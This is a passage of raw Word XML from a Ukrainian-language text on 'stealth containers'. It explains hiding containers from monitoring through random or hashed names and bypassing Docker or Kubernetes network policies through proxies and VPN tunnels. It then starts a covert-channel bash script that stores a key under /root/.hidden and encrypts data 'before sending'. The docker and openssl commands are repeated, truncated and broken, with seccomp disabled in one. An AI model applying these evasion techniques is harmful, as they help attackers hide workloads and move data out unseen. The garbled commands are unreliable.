          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand -hex 8) --network none --cap-drop ALL --security-opt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seccomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=unconfined my-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand -hex 8) --network none --cap-drop ALL --security-opt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seccomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand -hex 8) --network none --cap-drop ALL –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>securi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRPr="00BB02FF" w:rsidRDefault="00BB02FF" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Arial Unicode MS" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> run -d --name $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rand -hex 8) -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRDefault="001258F7" w:rsidP="001258F7">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9C560D" w:rsidRDefault="00BB02FF" w:rsidP="001258F7">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BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Стелс-контейнер часто використовує механізми ізоляції для того, щоб приховати свою присутність в системі. </w:t>
      </w:r>
      <w:r w:rsidR="009C560D" w:rsidRPr="009C560D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Це дозволяє досягти кількох важливих цілей щодо прихованого функціонування контейнера</w:t>
      </w:r>
      <w:r w:rsidR="009C560D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRDefault="009C560D" w:rsidP="009C560D">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9C560D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>По-перше, використання змінних ідентифікаторів, таких як випадкові імена, хешовані ідентифікатори або зашифровані метадані, робить контейнер менш помітним для стандартних інструментів моніторингу та аудиту. Так</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="009C560D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> маскування ускладнює його виявлення, оскільки ідентифікація контейнера за допомогою звичайних методів стає значно важчою.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRDefault="009C560D" w:rsidP="009C560D">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9C560D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>По-друге, спеціально налаштовані мережеві плагіни дозволяють контейнеру обходити стандартні політики мережевої безпеки, встановлені в Kubernetes або Docker. Наприклад, контейнер може підключатися до мережі через проксі-сервери або використовувати VPN-тунелювання для маршрутизації трафіку, що додає додатковий рівень складності для моніторингу і виявлення підозрілих мережевих з'єднань.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02FF" w:rsidRDefault="001258F7" w:rsidP="009C560D">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 Приховані канали зв’язку</w:t>
      </w:r>
      <w:r w:rsidR="00BB02FF" w:rsidRPr="00BB02FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-meta"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># Запуск зашифрованого тунелю для прихованого зв'язку</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t># Генерація ключа для шифрування</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>rand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="001258F7" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>rand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="001258F7" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32 &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>keyfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001258F7" w:rsidRPr="001258F7" w:rsidRDefault="001258F7" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t># Шифрування даних перед відправкою</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C560D" w:rsidRPr="001258F7" w:rsidRDefault="009C560D" w:rsidP="001258F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Sensitive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -aes-256-cbc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>salt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>encrypted_data.enc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001258F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
